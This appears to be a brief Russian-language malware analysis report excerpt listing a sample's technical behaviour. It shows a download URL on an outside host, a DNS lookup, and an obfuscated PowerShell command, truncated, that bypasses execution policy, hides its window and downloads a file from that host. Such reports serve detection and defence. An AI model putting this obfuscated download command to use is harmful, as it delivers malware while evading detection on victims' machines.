Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^WERS^HeLl.EXE ^-E^X^ec^u^T^ION^PoL^ICy bY^pASS^ -n^o^p^roF^I^lE -wi^n^do^ws^tY^Le^ ^h^IDd^EN (NEW-ob^jecT ^sysTEm^.^n^eT.^weBc^li^eNT).dOWNl^o^aDFIlE('http://www.zonedopes...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "pO^WERS^HeLl.EXE ^-E^X^ec^u^T^ION^PoL^ICy bY^pASS^ -n^o^p^roF^I^lE -wi^n^do^ws^tY^Le^ ^h^IDd^EN (NEW-ob^jecT ^sysTEm^.^n^eT.^weBc^li^eNT).dOWNl^o^aDFIlE('http://www.zonedopes...' (со скрытым окном)